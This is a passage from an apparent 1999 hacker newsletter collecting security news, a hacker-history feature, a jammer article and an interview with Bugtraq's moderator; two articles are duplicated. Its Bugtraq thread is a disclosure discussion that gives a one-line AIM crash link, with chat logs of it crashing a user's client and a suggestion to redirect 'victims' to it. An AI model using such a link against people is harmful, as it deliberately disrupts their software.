customer support staff were giving incorrect information to its members about Dixons' Freeserve service," AOL said in a written statement on Friday. "CompuServe did not receive any corroborated evidence to support the complaint but conducted an immediate and thorough investigation into these allegations. This was promptly followed by an undertaking by CompuServe that its customer support staff would not make any statements to members which could be considered defamatory by Dixons Freeserve." Both sides played down the gravity of the dispute. But it highlights the ferocious competition in the mushrooming market for internet service providers. Initially, companies like AOL sought to profit by charging fees both to subscribers and companies using the net to sell and advertise. AOL charges £16.95 a month for unlimited access to the net. CompuServe, which aims at a more professional audience, charges £17. In recent weeks, however, British internet service providers have set a worldwide trend by offering access to the net free. The strategy is to capture large numbers of net surfers and to think of them as shoppers in cyber shopping malls. ISPs attracting the most surfers have the best chance of selling their wares over the net, and also selling space in their cyber-shopping malls to other companies. Last month, booksellers WH Smith, The Sun, and HMV joined a growing number of companies offering free internet access. The British internet retail market is expected to grow to £3bn by 2003 from £236m last year, according to Forrester Research. Freeserve has 1.1 million subscribers in the UK. America Online has 17 million subscribers worldwide. In the face of the free access phenomenon, AOL and other fee-charging ISPs like Yahoo! are seeking to differentiate themselves. Last week Dixons, the UK's biggest electrical retailer, announced that it had appointed Credit Suisse First Boston and Cazenove to consider a partial flotation of Freeserve. Analysts said the exercise could value Freeserve at more than £2.5bn. Shares in Dixons hit an all-time high. @HWA 22.0 CyberWar and NetWar ~~~~~~~~~~~~~~~~~~~ From Wired http://www.wired.com/news/news/politics/story/19208.html How to Fight a Cyberwar Wired News Report 3:00 a.m. 20.Apr.99.PDT Future terrorists will take to the Internet to pursue campaigns of disruption instead of destruction, a new report predicts. Terrorists are already tech-savvy, the Rand Corporation paper claims. Osama bin Laden's remote Afghan retreat is well wired: "The terrorist financier has computers, communications equipment, and a large number of disks for data storage." Hamas has also taken to the Internet to exchange operational information. For example, operatives communicate via chat rooms and email. The report distinguishes between "cyberwar" -- a military operation -- and "Netwar," which, the authors believe, will consist of nonmilitary attacks perpetrated by individuals rather than countries. "Whereas cyberwar usually pits formal military forces against each other, Netwar is more likely to involve nonstate, paramilitary, and irregular forces." The report, prepared for the US Air Force, recommends that the Pentagon stop modernizing all computer systems and communications links. "Full interconnectivity may in fact allow cyberterrorists to enter where they could not [before]," it says. The report warns that terrorism "will focus on urban areas with strong political and operational constraints." Translation:It's difficult for the Air Force to bomb the bejesus out of a terrorist nest if it's in downtown New York. Another recommendation is that the Air Force develop better spying technologies. Instead of trying to break encryption, the military should develop "capabilities for reading emanations" from computer monitors, perhaps through "very small, unmanned aerial vehicles." Other studies have reached similar conclusions about online terrorists. "The Internet -- and the window to it, the computer terminal -- have become two of the most important pieces of equipment in the extremists' arsenals, not only allowing them to build membership and improve organization, but to strike alliances with people and groups, even a decade ago, that they might never have known about or been able to easily communicate with," says a report prepared in April 1998 for the Chemical Manufacturers Association. The report's authors are former officials from the US Secret Service and the CIA's counterterrorism center. @HWA 23.0 IT Managers push for better online security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.techweb.com/wire/story/TWB19990420S0007 IT Managers Push For Better Online Security (04/20/99, 1:28 p.m. ET) By Andrew Darling, InformationWeek U.K. Senior managers remain blissfully ignorant of the external security risks businesses are exposed to through e-commerce applications, choosing instead to believe firewalls alone will provide adequate protection, said network and security managers. Despite predicted growth in the IT security-services market being driven by more complex and effective security products, network managers said senior management -- blinded by the exciting prospect of online transactions and distracted by operational concerns -- don't see security as a priority and remain convinced that setting up a firewall is adequate to maintain system integrity. IT managers warn systems face attack from more sophisticated macro viruses to "millennium crackpots," and one analyst slammed security suppliers for exposing customers to higher risks by selling the idea of fortified firewalls when users should be restructuring systems to account for increased outside access. "I've been trying to get the security issue raised at the higher levels, but it's difficult to get executives to take note," said Martin Bennett, group communications architect at food and drink conglomerate Diageo. "We've just merged and they are all very busy with that." The Diageo group includes Guinness, United Distillers, and Burger King and runs off a global network Bennett accepts is increasingly susceptible to attack. "We've got about 500 routers, which translates into roughly 400 sites. We need to raise the issue of security and do as much as possible to protect ourselves. Ultimately, this means taking a framework approach, but at the moment, we use point solutions from different vendors," Bennett said. "The Melissa virus was possibly one of the best things that could have happened," said Danny Hulligan, security manager for IT systems at Swiss Life Insurance. "The high-profile reaction has forced senior executives to become aware of the risk." Beware Of The Chernobyl Virus While Hulligan said his company had not itself been affected by the macro virus, he expressed concern about the "Chernobyl virus" security experts warn will hit the e-mail community on April 26th -- the 13th anniversary of the Russian nuclear plant's meltdown. This latest virus is expected to attack the Bios chip, the device that "warms up" a PC for readiness when it is switched on. "It shows these macro viruses are going to be one of the most serious threats. How long before the suppliers catch up?" said Hulligan. Both Hulligan and Bennett agree that getting the security message across to the board is a high priority, though in practice very difficult. Geoff Dunn, IT director at Harvey Nash, shared their concerns. "We should have a security policy, but we do not. The bosses don't take it seriously enough," he said. As business moves onto an electronic transaction-based platform, corporate networks will have to open themselves up to the outside world to trade and share more information. This could leave corporates exposed to attack as front-end and back-office systems become more entwined. "Senior executives are beginning to see the lucrative potential of ecommerce, but many still do not understand IT security implications," said Jonathan Tikochinski, an analyst with Datamonitor's e-commerce group. According to Tikochinski, companies could learn a lot from the banks. "With electronic business, you theoretically provide network access to the whole world," he said. "Banks have got around this problem by isolating the online server from the back-office server and then downloading the data overnight. The approach to designing your infrastructure has to be different from how it used to be." However, he said the leading security vendors are not interested in this. "The firewall vendors will say that is enough, but you need to fortify the firewall, and the vendors are worried about cannibalising their main source of revenue," he said. That's an accusation denied by Network Associates, which recently launched Active Security, an enterprise security initiative that integrates its tools with products and services from suppliers such as Microsoft, Hewlett-Packard, and PricewaterhouseCoopers to create a networked environment that reacts automatically to security breaches. The key element in this suite is Network Associates' Event Orchestrator, a management system that, once an attack is detected, automatically communicates with all connected systems, which, in turn, trigger their own protective measures, such as a firewall restricting access to the server. "All these products work well together," said Martin Brown, senior security consultant at Network Associates, in Santa Clara, Calif. "Everything's been visual in terms of warnings, but very little happens automatically. This is an effective secure management solution." Hulligan said though a warning about Melissa was received via the Computer Emergency Response Team website and e-mail service the day after the virus was released, anything automated would have helped him. IBM has also released a suite of integrated end-to-end security solutions. SecureWay First Secure is aimed at customers of all sizes, and who want to start doing e-commerce but are worried about the risk to their infrastructure. It's a message Bennett is pleased to hear. He said there are business pressures to develop better remote access to the network, but he is worried by the security implications of this. "I want more information and advice," he said. Security Will Improve The security market is set to grow, despite recent revenue slowdown because of a diversion of IT budgets toward last-minute Y2K spending. Preliminary findings from a soon-to- be published Datamonitor report, Internet and Network Security, reveal the 1998 European market reached around $640 million (£400 million) and is expected to rise to $2.25 billion (£1.45 billion) by 2001. "It's a very serious threat we have to address. With the millennium coming up, there's going to be all sorts of crackpots out there doing things," said Hulligan. IT Managers Push For Better Online Security (04/20/99, 1:28 p.m. ET) By Andrew Darling, InformationWeek U.K. Senior managers remain blissfully ignorant of the external security risks businesses are exposed to through e-commerce applications, choosing instead to believe firewalls alone will provide adequate protection, said network and security managers. Despite predicted growth in the IT security-services market being driven by more complex and effective security products, network managers said senior management -- blinded by the exciting prospect of online transactions and distracted by operational concerns -- don't see security as a priority and remain convinced that setting up a firewall is adequate to maintain system integrity. IT managers warn systems face attack from more sophisticated macro viruses to "millennium crackpots," and one analyst slammed security suppliers for exposing customers to higher risks by selling the idea of fortified firewalls when users should be restructuring systems to account for increased outside access. "I've been trying to get the security issue raised at the higher levels, but it's difficult to get executives to take note," said Martin Bennett, group communications architect at food and drink conglomerate Diageo. "We've just merged and they are all very busy with that." The Diageo group includes Guinness, United Distillers, and Burger King and runs off a global network Bennett accepts is increasingly susceptible to attack. "We've got about 500 routers, which translates into roughly 400 sites. We need to raise the issue of security and do as much as possible to protect ourselves. Ultimately, this means taking a framework approach, but at the moment, we use point solutions from different vendors," Bennett said. "The Melissa virus was possibly one of the best things that could have happened," said Danny Hulligan, security manager for IT systems at Swiss Life Insurance. "The high-profile reaction has forced senior executives to become aware of the risk." Beware Of The Chernobyl Virus While Hulligan said his company had not itself been affected by the macro virus, he expressed concern about the "Chernobyl virus" security experts warn will hit the e-mail community on April 26th -- the 13th anniversary of the Russian nuclear plant's meltdown. This latest virus is expected to attack the Bios chip, the device that "warms up" a PC for readiness when it is switched on. "It shows these macro viruses are going to be one of the most serious threats. How long before the suppliers catch up?" said Hulligan. Both Hulligan and Bennett agree that getting the security message across to the board is a high priority, though in practice very difficult. Geoff Dunn, IT director at Harvey Nash, shared their concerns. "We should have a security policy, but we do not. The bosses don't take it seriously enough," he said. As business moves onto an electronic transaction-based platform, corporate networks will have to open themselves up to the outside world to trade and share more information. This could leave corporates exposed to attack as front-end and back-office systems become more entwined. "Senior executives are beginning to see the lucrative potential of ecommerce, but many still do not understand IT security implications," said Jonathan Tikochinski, an analyst with Datamonitor's e-commerce group. According to Tikochinski, companies could learn a lot from the banks. "With electronic business, you theoretically provide network access to the whole world," he said. "Banks have got around this problem by isolating the online server from the back-office server and then downloading the data overnight. The approach to designing your infrastructure has to be different from how it used to be." However, he said the leading security vendors are not interested in this. "The firewall vendors will say that is enough, but you need to fortify the firewall, and the vendors are worried about cannibalising their main source of revenue," he said. That's an accusation denied by Network Associates, which recently launched Active Security, an enterprise security initiative that integrates its tools with products and services from suppliers such as Microsoft, Hewlett-Packard, and PricewaterhouseCoopers to create a networked environment that reacts automatically to security breaches. The key element in this suite is Network Associates' Event Orchestrator, a management system that, once an attack is detected, automatically communicates with all connected systems, which, in turn, trigger their own protective measures, such as a firewall restricting access to the server. "All these products work well together," said Martin Brown, senior security consultant at Network Associates, in Santa Clara, Calif. "Everything's been visual in terms of warnings, but very little happens automatically. This is an effective secure management solution." Hulligan said though a warning about Melissa was received via the Computer Emergency Response Team website and e-mail service the day after the virus was released, anything automated would have helped him. IBM has also released a suite of integrated end-to-end security solutions. SecureWay First Secure is aimed at customers of all sizes, and who want to start doing e-commerce but are worried about the risk to their infrastructure. It's a message Bennett is pleased to hear. He said there are business pressures to develop better remote access to the network, but he is worried by the security implications of this. "I want more information and advice," he said. Security Will Improve The security market is set to grow, despite recent revenue slowdown because of a diversion of IT budgets toward last-minute Y2K spending. Preliminary findings from a soon-to- be published Datamonitor report, Internet and Network Security, reveal the 1998 European market reached around $640 million (£400 million) and is expected to rise to $2.25 billion (£1.45 billion) by 2001. "It's a very serious threat we have to address. With the millennium coming up, there's going to be all sorts of crackpots out there doing things," said Hulligan. @HWA 24.0 Hackers and Crackers "Computer Hackers America's real threat' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From corporations to universities, computer hackers are still making trouble and breaking the law. BY KIM KOMANDO - White Knights And Dark Horses - Hacker Turned Informant - Fighting The Good Fight - Big Daddy Mitnick - The Internet's Role - Life Imitates Computers, Or Vice Versa The room in the apartment is dark and cluttered, the only light coming from the computer monitor. Two shadowy figures sit at the computer working. "Whew, we're in!" shouts the dirty-looking guy with the scraggly beard, pointing to the screen. "Wow, you actually got into personnel," the woman says in wonder, staring at the screen. "And look," she says, "this senior vice president makes twice as much as this one does. I bet he'd love to know about that." The man hits a button. "He does. I just e-mailed everyone in the company." This widely seen TV commercial for IBM business solutions paints a frightening portrait of computer hackers at work, illegally breaking into a company's most private personnel files. But could this actually happen in real life? Has it? Yes, on both counts. The history of computer hacking is a dark spiral of teenage angst. In fact, one of the first known arrests for computer hacking targeted six teens in the Milwaukee area in 1983. The group was accused of breaching as many as 60 computer systems, including those at the likes of the Los Alamos National Laboratory and the Memorial Sloan-Kettering Cancer Center. One of the youths cut a deal. The other five got probation based on the testimony of the first. In 1987, a 17-year-old high school dropout, Herbet Zinn, was busted for hacking AT&T omputers. During the Persian Gulf War, a band of Dutch teenagers compromised Defense Department computers. In 1992, New York City teenagers breached the supposedly secure computers at TRW, the National Security Agency and Bank of America. And as recently as last summer, teenage hackers from Cloverdale, Calif., were sentenced in what Deputy Defense Secretary John Hamre characterized as "the most organized and systematic attack the Pentagon has seen to date." And who can forget Matthew Broderick as a NORAD-computer cracking teenager in the '80s hit movie "War Games," and later as the attendance-record-altering Ferris Bueller in "Ferris Bueller's Day Off"? So, when you think your kid is spending hours on his PC playing "Doom," he might actually be hacking into your employer's computer system. It's a scary thought. White Knights And Dark Horses The computer-cracking culture can be broken down into four basic groups. To the general public, the term "hacker" has come to mean someone who gains illegal access to a computer system. However, in geekspeak, the term has a very different definition. To insiders, a hacker is merely an avid computer enthusiast. These types often do gain access to systems they're not supposed to, but they don't do it with ill intentions. Instead, the goal of the hacker is mental stimulation, much like fiddling with a Rubic's Cube. The bigger the hack, the greater the bragging rights. This isn't to say that hackers can't cause problems. In March 1998, a young hacker was caught breaking into Bell Atlantic's computer systems. Although his intention was only to poke around, he inadvertently disrupted the tower-to-aircraft communications for 6 hours at Worcester Airport in Massachusetts. While no accidents resulted, it's easy to see the potential danger in this sort of activity. The most obvious troublemakers in this culture are termed "crackers." These are generally misguided people with some sort of anarchist bent. They delight in breaking into systems and fouling things up. For example, last year, visitors to the New York Times Web site got quite a surprise. Instead of reaching the site's home page, they were treated to a garbled manifesto by a group calling itself HFG, or H4CK1NG F0R G1RL13Z (translation: Hacking for Girlies). In fact, our own Popular Mechanics Web site, the PMZone, has been hacked a couple of times. Perhaps the most dangerous contingent of the hacker corps is the one you never hear about. These people aren't interested in fame or intellectual stimulation. They're simply in it for the money. They hack into the computer systems at financial institutions, transfer money to different accounts and then vanish. Sound interesting? So why do we seldom, if ever, read of such exploits? The answer is simple: security. Financial institutions are very tight-lipped about such breaches, fearing that any publicity will only encourage copycat offenders. They'd rather take the hit and deal with the matter internally than trigger a potential feeding frenzy among the hacker community. Recently, though, it seems as if the hacker community has come of age. In fact, a number of former cyber ne'er-do-wells have begun to expend their energy and talents for the good of the world. Some of them are motivated by profit. Others simply see themselves on a goodwill mission. Hacker Turned Informant Talk about a checkered past. One of Justin Petersen's first cyberexploits was assisting in the rigging of the Pacific Bell phone system so that he and his partner would have exclusive access to a radio station's contest line. The result: The pair won all sorts of cash, cars and other prizes. That was in 1989. In 1991, Petersen was busted on a number of computer-related charges, including hacking into TRW's credit reporting system to find information that he later used to obtain bogus credit cards. But instead of going to prison, he cut a deal and became an FBI informant in that agency's pursuit of other criminal hackers, including Kevin Mitnick. Both during and after his service with the FBI, Petersen committed an additional string of computer-related crimes, including the cybertheft of $150,000 from a financial institution. On Sept. 30, 1998, the U.S. District Court in Los Angeles issued an arrest warrant for Petersen for parole violations. U.S. marshals found him on Dec. 11, 1998, holed up in a Studio City, Calif., apartment that he shared with three other people. His arrest should not have been a surprise to Petersen. One of the marshals had sent Petersen an e-mail a few days before that read, "We're coming and hell's coming with us." Petersen read the message but didn't notice who sent it. Fighting The Good Fight Some hackers have chosen to use their skills for the betterment of society. Theirs is a higher cause. Case in point: Christian Valor, a k a Se7en. Valor spent 17 years in the hacker underground, and for most of that time he dismissed reports of online kiddie porn as exaggerated claims by overzealous lawmakers. His suspicions were reinforced when in 1996, he spent eight weeks combing the Web for child pornography and came up empty-handed.Then he discovered chat channels and newsgroups that catered to pedophiles and other perverts. That was a rude awakening for Valor. In 1997, after discovering just how low his fellow Netizens could stoop, Valor made a vow to disrupt the online activities of kiddie porn peddlers in any way that he could legal or not. Of course, it's highly unlikely that any child pornographer would cry foul to the authorities. And if someone were stupid enough to turn this Robin Hood-like figure in to the police, Valor says he's been assured by the Secret Service that they'd probably decline to take action on the matter. Valor's first target in his new crusade was an employee of Southwestern Bell. Although the perpetrator took numerous steps to cover his tracks, Valor was able to determine that this fellow was using his employer's computers as home base for his kiddie porn operation. Valor claims that several days after e-mailing the evidence to the president and network administrators at Southwestern Bell, he received a message back that the pornographer was no longer employed there. Valor's crusade has led other hackers to join the fight. In fact, there's even a Hackers Against Child Pornography site that encourages others to take up their keyboards and modems against online kiddie porn peddlers. Combined with a couple of large-scale multinational child pornography busts that took place in 1998, maybe these cyberspace sexual misfits will think twice about their chosen "lifestyle." Big Daddy Mitnick No one in the history of computerdom has become more closely linked with the word "hacker" than Kevin Mitnick. At first glance, Mitnick's story appears quite simple. Since he was 17, Mitnick had been in and out of trouble with the law over computer-related offenses. According to prosecutors, he began a particularly active hacking spree in 1994. However, he made the fatal mistake of hacking into the San Diego Supercomputer Center and ticking off system administrator Tsutomu Shimomura. The media portrayed Shimomura as a valiant white knight who went to great lengths to help the FBI nail his nemesis a couple of months later in North Carolina. Seems like a slam-dunk, doesn't it? However, a considerable amount of controversy surrounds the Mitnick case to this day. Dectractors claim that Shimomura fabricated evidence, and that journalist John Markoff had a conflict of interest in the matter, since he and Shimomura coauthored a book about the case that allegedly raked in a tidy profit. Equally disturbing was the government's handling of the case. The charges filed against Mitnick claim that he caused more than $80 million in damages to such high-profile companies as Motorola and Nokia. However, the companies named by the government have never publicly acknowledged any losses from any activity by Mitnick. Furthermore, as of this writing, Mitnick has spent more than three years in prison without bail and without a trial. That's longer than many convicted felons spend in the big house. Mitnick's supporters also claim that he has been denied access to the evidence that is to be presented against him. Mitnick's trial was scheduled to begin April 20, 1999. It's going to be very interesting to see how this all shakes out. The Internet's Role In the early days, hacking was more difficult in some ways. For starters, covering your tracks took more work. To hide the calls you made from your own modem, you had to be able to hack into the telephone company system and fiddle with those computers. Plus, you had to know what phone numbers to dial. That sort of thing. Today, however, just about every company on the planet has Internet access. And many companies maintain some sort of remote-access system that allows employees and contractors to connect from home or the field. That means finding a company to hack is often as easy as figuring out where on the Internet the company is located. And instead of having to disguise phone numbers, hackers find it much easier to cover any tracks they may have laid while zigzagging the Internet in search of the perfect hack. The Internet also has allowed the hackers of the world to develop a greater sense of community. There are dozens of Web sites and Usenet groups devoted to hackers and the art of hacking. Life Imitates Computers, Or Vice Versa There have been criminals for just about as long as there have been people. And just as banks are robbed to this very day–despite tremendous improvements in law enforcement technology–so will computers continue to be hacked and cracked for years to come. The only thing that's likely to change is the technique. @HWA 25.0 URL bug in AIM creates a DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 19 Apr 1999 22:00:00 -0500 From: Adam Brown To: BUGTRAQ@netspace.org Subject: AOL Instant Messenger URL Crash There is a bug in the newer versions of AOL's Instant Messenger that will cause the client to crash when exploited. All builds of version 2.0 that I've tested seem to be vulnerable, although I have not done extensive version testing. AOL was notified of this about two weeks ago. To exploit this bug, send a hyperlink in this format: aim:addbuddy?=screenname Have fun, SpunOne http://www.fazed.net http://www.webzone.net -------------------------------------------------------------------------- Date: Tue, 20 Apr 1999 16:24:02 -0400 From: Daniel Reed To: BUGTRAQ@netspace.org Subject: Re: AOL Instant Messenger URL Crash On Mon, 19 Apr 1999, Adam Brown wrote: ) There is a bug in the newer versions of AOL's Instant Messenger that will ) cause the client to crash when exploited. All builds of version 2.0 that ) I've tested seem to be vulnerable, although I have not done extensive ) version testing. AOL was notified of this about two weeks ago. To exploit ) this bug, send a hyperlink in this format: aim:addbuddy?=screenname I just sent what does this show up as? to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't know if you meant to say that the user had to click on it for the client to crash, or if this is indeed different behaviour. I also just tried it with "screenname" replaced with first her screenname, and then with mine, again with no automatic reaction. (sent from linuxkitty, a naim-0.9.4-parse2 user, to , an AOL AIM 2.0.996 user) [15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what does this show up as]? [16:00:23] Friend has just logged off :( [16:03:09] Friend is now online =) [16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=":miaow miaow] (don't click on that, I'm just testing something) [16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":anoth er test...] -- Daniel Reed Many a false step is made by standing still... -------------------------------------------------------------------------- Date: Tue, 20 Apr 1999 16:34:16 -0500 From: Adam Brown To: BUGTRAQ@netspace.org Subject: Re: AOL Instant Messenger URL Crash I'm sorry if I was unclear in my first post. The only way I've seen to exploit this is to send someone a hyperlink in the form of aim:addbuddy?=screenname and have them click on it. (replacing "screenname" with an actual screen name seems to give the same result) You can also set up a web page that will redirect your victim to a client crashing URL once they've caught on to your evil little scheme. :p I set up an example of this at http://www.fazed.net/poof for testing purposes, of course. Adam Brown SpunOne@IRC http://www.fazed.net http://www.webzone.net -------------------------------------------------------------------------- Date: Wed, 21 Apr 1999 14:30:40 -0400 From: Eric L. Howard To: BUGTRAQ@netspace.org Subject: Re: AOL Instant Messenger URL Crash I haven't been able to duplicate this on any 2.0.8* builds...I've tested about 15 different people and none in the 2.0.8* builds were affected. All others tested were in the 2.0.9* build and died immediately, some causing the user to have to reboot, all rendering AIM completly unable to be restarted for several minutes after the Dr. Watson cleared on NT. ~ELH~ -------------------------------------------------------------------------- Date: Wed, 21 Apr 1999 18:14:59 -0700 From: Adam Herscher To: BUGTRAQ@netspace.org Subject: Re: AOL Instant Messenger URL Crash The problem could not be duplicated on AIM 2.0.813 (Windows 98) running IE 5.0 - Is it possible that this is in part a problem with IE 4.0? Adam Herscher (ajh-) -------------------------------------------------------------------------- Date: Wed, 21 Apr 1999 18:07:12 -0700 From: Adam Herscher To: BUGTRAQ@netspace.org Subject: Re: AOL Instant Messenger URL Crash >I'm sorry if I was unclear in my first post. The only way I've seen to >exploit this is to send someone a hyperlink in the form of >aim:addbuddy?=screenname and have them click on it. (replacing "screenname" >with an actual screen name seems to give the same result) You can also set >up a web page that will redirect your victim to a client crashing URL once >they've caught on to your evil little scheme. :p I set up an example of >this at http://www.fazed.net/poof for testing purposes, of course. > >Adam Brown >SpunOne@IRC >http://www.fazed.net >http://www.webzone.net This doesn't seem to work on the Mac versions (tested 2.01.644) Adam Herscher (ajh-) @HWA 26.0 Shutting up Cell Phones ~~~~~~~~~~~~~~~~~~~~~~~ From dc-stuff list I missed this one a while back, but its interesting reading, I had a site at one time with the jammer information but have since lost the url. anyway heres the story; Shutting Up Cell Phones by Stewart Taggart 3:00 a.m. 26.Mar.99.PST If you want to neutralize pesky adversaries in wartime, disrupt their communications. If you want to do the same in peacetime, disable their mobile phones. By selling a frequency jammer that prevents mobile-phone communications over a limited area, an Israeli company has taken a classic swords-to-plowshares approach in commercializing a military technology. Picture the benefits: By silencing all the mobile phones in a restaurant, movie theater, or concert hall, you can disconnect all those social boors unwilling to shut off their phones themselves. "Education, detectors, signs -- all have proven to be ineffective," says Tammy Neufeld, spokeswoman for Netline Communications Technologies, a Tel Aviv company that sells jammers. "Cellular phone operators are earning billions of dollars at the expense of people's quality of life." But in selling this unique revenge against the mobile hordes, the Israelis are encountering a powerful adversary not seen on the battlefield: government regulators. On 10 March, the Australian Communications Authority banned the device in that country, saying it could interfere with emergency services, leave businesses' on-call personnel out of reach, and possibly interfere with other devices. In making its decision, the ACA said its role is to facilitate access to spectrum, not deny it. It recommended less drastic measures in dealing with mobile phones, such as signs, announcements, and encouraging people to use their phone's silent messaging feature. By emitting a kind of electromagnetic white noise, jammers prevent mobile phones from exchanging "handshake" signals with their closest mobile-phone tower. Within range of the jammer, the mobile-phone system is tricked into believing that the user is out of range or has the unit switched off. The jammer can disrupt mobile communication over an area ranging from several meters to several kilometers. "It's clearly a crude instrument," says Alex Nourouzi, a telecommunications analyst with Ovum, a Sydney market research firm. "But there's definitely a market for this as people become sick and tired of the disruptions caused by mobile phones." But Nourouzi says mobile-phone spectrum is like a public space that individuals shouldn't be able to shut down on a whim. He likened it to blocking a highway because you object to vehicle noise. He believes other solutions will be found to the mobile phone nuisance. But for now, he concedes, "jammers have gotten people thinking." In Great Britain, some commuter and inter-city trains have special cars where the phones are forbidden. They bear a metallic coating that prevents mobile-phone transmissions -- providing some respite for train riders wanting peace and quiet. In the United States, mobile jammers are banned by the Federal Communications Commission, which prohibits intentional jamming of radio signals. Japan's Ministry of Post and Telecommunications, however, is allowing jammers to be tested in theaters, concert halls, cinemas, and lecture halls, where silence is supposed to be golden. Netline defends the jammer, saying it could prove useful in places like hospitals or planes, where a mobile phone might pose risks to medical equipment or flight navigation gear. Neufeld also says jammers should be allowed on private property so homeowners can enjoy a quiet zone, safe from the mobile's endless intrusions. In the end, Neufeld says the jammer's hash may have to be settled in court, or through new legislation. "Cellular phone operators encourage people to use their cellular phones at all times and all places without discretion," Neufeld says. "We believe many countries are rapidly realizing that there is a need to regulate this issue in a legal manner." Shutting Up Cell Phones by Stewart Taggart 3:00 a.m. 26.Mar.99.PST If you want to neutralize pesky adversaries in wartime, disrupt their communications. If you want to do the same in peacetime, disable their mobile phones. By selling a frequency jammer that prevents mobile-phone communications over a limited area, an Israeli company has taken a classic swords-to-plowshares approach in commercializing a military technology. Picture the benefits: By silencing all the mobile phones in a restaurant, movie theater, or concert hall, you can disconnect all those social boors unwilling to shut off their phones themselves. "Education, detectors, signs -- all have proven to be ineffective," says Tammy Neufeld, spokeswoman for Netline Communications Technologies, a Tel Aviv company that sells jammers. "Cellular phone operators are earning billions of dollars at the expense of people's quality of life." But in selling this unique revenge against the mobile hordes, the Israelis are encountering a powerful adversary not seen on the battlefield: government regulators. On 10 March, the Australian Communications Authority banned the device in that country, saying it could interfere with emergency services, leave businesses' on-call personnel out of reach, and possibly interfere with other devices. In making its decision, the ACA said its role is to facilitate access to spectrum, not deny it. It recommended less drastic measures in dealing with mobile phones, such as signs, announcements, and encouraging people to use their phone's silent messaging feature. By emitting a kind of electromagnetic white noise, jammers prevent mobile phones from exchanging "handshake" signals with their closest mobile-phone tower. Within range of the jammer, the mobile-phone system is tricked into believing that the user is out of range or has the unit switched off. The jammer can disrupt mobile communication over an area ranging from several meters to several kilometers. "It's clearly a crude instrument," says Alex Nourouzi, a telecommunications analyst with Ovum, a Sydney market research firm. "But there's definitely a market for this as people become sick and tired of the disruptions caused by mobile phones." But Nourouzi says mobile-phone spectrum is like a public space that individuals shouldn't be able to shut down on a whim. He likened it to blocking a highway because you object to vehicle noise. He believes other solutions will be found to the mobile phone nuisance. But for now, he concedes, "jammers have gotten people thinking." In Great Britain, some commuter and inter-city trains have special cars where the phones are forbidden. They bear a metallic coating that prevents mobile-phone transmissions -- providing some respite for train riders wanting peace and quiet. In the United States, mobile jammers are banned by the Federal Communications Commission, which prohibits intentional jamming of radio signals. Japan's Ministry of Post and Telecommunications, however, is allowing jammers to be tested in theaters, concert halls, cinemas, and lecture halls, where silence is supposed to be golden. Netline defends the jammer, saying it could prove useful in places like hospitals or planes, where a mobile phone might pose risks to medical equipment or flight navigation gear. Neufeld also says jammers should be allowed on private property so homeowners can enjoy a quiet zone, safe from the mobile's endless intrusions. In the end, Neufeld says the jammer's hash may have to be settled in court, or through new legislation. "Cellular phone operators encourage people to use their cellular phones at all times and all places without discretion," Neufeld says. "We believe many countries are rapidly realizing that there is a need to regulate this issue in a legal manner." @HWA 27.0 Interview with Aleph1 creator of BUGTRAQ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: http://www.networkcommand.com/one.html If someone just dropped a bomb on the security industry, if MS has put out a press release to quell users fears, you can usually trace the initial message back somewhere. Bugtraq is the most often the source. Aleph1 is the moderator of Bugtraq and shares his views about the world, security, opensource and quantum cryptography. You can read bugtraq at geek-girl. So, let's get started with the standard information... [taken from the Bugtraq FAQ] 0.1 What is BugTraq? This list is for *detailed* discussion of computer security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. 0.1 What is appropriate content? Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: o Information on Unix related security holes/backdoors (past and present) o Exploit programs, scripts or detailed processes about the above o Patches, workarounds, fixes o Announcements, advisories or warnings o Ideas, future plans or current works dealing with Unix security o Information material regarding vendor contacts and procedures o Individual experiences in dealing with above vendors or security organizations o Incident advisories or informational reporting EOF There has been some talk on other mailing lists of switching to a paid subscription service -- gotta eat somehow. Bugtraq has always been free, do you have a day job? I assume you are talking about NTBUGTRAQ. Yes, I have a day job although it tends to change every year or so. I've also been lucky that I've always managed to have enough free time to manage the list, which normally takes about one or two hours a day. But let me assure you that BUGTRAQ will always, so long as it is within my power, be free. BUGTRAQ is about community and the free exchange of information. BUGTRAQ is what it is because of its subscribers. Seems like a rather fast way to kill the list would be to tell people they have to pay for the privilege to read their own posts. What is the current number of list subscribers on bugtraq now? Twenty seven thousand five hundred. Give or take a few. Sometimes do people send you email just thanking you for what the list provides? Yesterday I thought, "What if bugtraq just went away?? What would we do?" There will be a time when either bugtraq or the open source movement will save your ass if it hasn't happened already. Sometimes. Mostly after an "Administrivia" message. There have been people that have joined and don't even realize there is a moderator until one of those posts. It feels nice when people let you know they think you are doing a good job, but as with any position that involves some public visibility there will always be some group that thinks otherwise. Over the years I've learned to run things as I like and not to worry about what people think. If they like how things are being run the list will prosper. If they don't then they will move on and the list will disappear. What was the first computer you were ever exposed to? Compared to some people in this industry/community I would consider myself a late comer to the computer world. I believe my first contact with computers was during middle school where I learned programming using Logo on an Apple IIe. For several years after that I had no contact with computers. Next I took a Lotus 123 and Dbase IV class using IBM PCs. I also obtained access through family and friends to a few macs. The first computer I owned was an Apple II GS. At the time I had little access to any software other than that which came with the machine so I learned Apple BASIC. I truly become involved with computers when I moved to go to college. I brought a 466 DX 50, took some college computer classes and learned about unix. About this same time I become involved with the hacker underground. Did you ever get involved with the BBS scene? Yes but only to a limited degree. At some point I had become interested in the hacker phenomenon. I had seen the movie War Games some years before so it might have been the seed that sparked my curiosity. I had done some research at my college's library and come up with several news and magazine articles, including the infamous Esquire article that made Captain Crunch famous. I also read the books Cyberpunk and Hackers. Somewhere I came across a copy of 2600 and brought it. This issue of 2600 had, what else, plans on how to make a red box out of a radio shack tone dialer. I decided to try to build the device so I went down to my local Radio Shack store to buy the part. In the store also buying some parts where to rather curious characters. I asked the attendant for the crystal and some other part. In the mean time the two other guys paid and left the store. When I left the store I found them waiting for me. They asked me what I was building and I replied it was a red box. I asked 